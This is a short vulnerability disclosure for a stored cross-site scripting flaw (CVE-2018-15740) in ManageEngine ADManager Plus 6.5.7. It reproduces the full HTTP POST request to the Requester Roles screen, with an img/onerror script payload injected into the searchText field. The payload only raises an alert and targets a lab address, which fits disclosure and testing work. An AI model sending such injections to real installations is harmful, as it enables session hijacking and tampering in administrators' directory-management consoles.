ManageEngine ADManager Plus 6.5.7 Cross Site Scripting

`# Exploit Title: ManageEngine ADManager Plus 6.5.7 - Stored XSS  
# Date: 2018-08-21   
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: https://www.manageengine.com/  
# Hardware Link : https://www.manageengine.com/products/ad-manager/  
# Software : ZOHO Corp ManageEngine ADManager Plus  
# Product Version: 6.5.7  
# Vulernability Type : Cross-site Scripting  
# Vulenrability : Stored XSS  
# CVE : CVE-2018-15740  
  
# Zoho ManageEngine ADManager Plus 6.5.7 has XSS on the "Workflow Delegation" "Requester Roles" screen.  
  
# HTTP Reuquest Header :  
  
Request URL: http://172.16.2.105:8080/RequesterRoles.do?selectedTab=workflow&methodToCall=ShowReqRoleResultRows  
Request Method: POST  
Status Code: 200 OK  
Remote Address: 172.16.2.105:8080  
Referrer Policy: no-referrer-when-downgrade  
Accept: */*  
Accept-Encoding: gzip, deflate  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: keep-alive  
Content-Length: 240  
Content-type: application/x-www-form-urlencoded;charset=UTF-8  
Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=79DE1A7AE1DC5B7D88FCBF02AB425987; JSESSIONIDSSO=19AA1682A937F344D1DCB190B31343FB  
Host: 172.16.2.105:8080  
Origin: http://172.16.2.105:8080  
Referer: http://172.16.2.105:8080/RequesterRoles.do?methodToCall=viewRequestersRole&selectedTab=workflow&selectedTile=RequestorsRole&operation=view  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36  
X-Requested-With: XMLHttpRequest  
  
# Query String Parameters :  
  
selectedTab: workflow  
methodToCall: ShowReqRoleResultRows  
  
# Form Data :  
  
params: {"startIndex":0,"range":25,"toIndex":0,"searchText":"\"><img src=x onerror=alert('ismailtasdelen')>","ascending":true,"sortColumn":REQUESTER_ROLE_NAME,"isNewRange":false}  
adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2  
  
`